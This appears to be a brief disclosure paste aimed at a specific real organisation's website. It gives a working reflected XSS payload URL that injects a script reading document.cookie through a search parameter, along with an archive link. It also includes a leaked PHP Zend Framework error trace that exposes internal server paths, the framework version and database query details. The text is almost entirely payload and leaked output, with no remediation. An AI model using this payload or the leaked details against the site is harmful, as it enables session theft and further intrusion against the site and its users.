simple XSS (via GET or POST)
http://www.confindustria.benevento.it/moduli/ricerca/ricerca.php?campo=%3Cscript%3Ealert(document.cookie);%3C/script%3E
archived (javascript that shows the cookie): http://archive.is/8WN7B
Fatal error: Uncaught exception 'Zend_Db_Adapter_Exception' with message 'SQLSTATE[08004] [1040] Too many connections' in /usr/local/ZendFramework-1.8.5-minimal/library/Zend/Db/Adapter/Pdo/Abstract.php:138
Stack trace:
#0 /usr/local/ZendFramework-1.8.5-minimal/library/Zend/Db/Adapter/Pdo/Mysql.php(96): Zend_Db_Adapter_Pdo_Abstract->_connect()
#1 /usr/local/ZendFramework-1.8.5-minimal/library/Zend/Db/Adapter/Abstract.php(828): Zend_Db_Adapter_Pdo_Mysql->_connect()
#2 /usr/local/ZendFramework-1.8.5-minimal/library/Zend/Db/Adapter/Abstract.php(898): Zend_Db_Adapter_Abstract->quote('TITOLO_ITALIANO', NULL)
#3 /usr/local/ZendFramework-1.8.5-minimal/library/Zend/Db/Select.php(930): Zend_Db_Adapter_Abstract->quoteInto('variabile=?', 'TITOLO_ITALIANO', NULL)
#4 /usr/local/ZendFramework-1.8.5-minimal/library/Zend/Db/Select.php(463): Zend_Db_Select->_where('variabile=?', 'TITOLO_ITALIANO', NULL, true)
#5 /var/www/vhosts/confindustria.benevento.it/httpdocs/includes/php/class/setting.class.php(65): Zend_Db_Select->where('variabile=?' in /usr/local/ZendFramework-1.8.5-minimal/library/Zend/Db/Adapter/Pdo/Abstract.php on line 138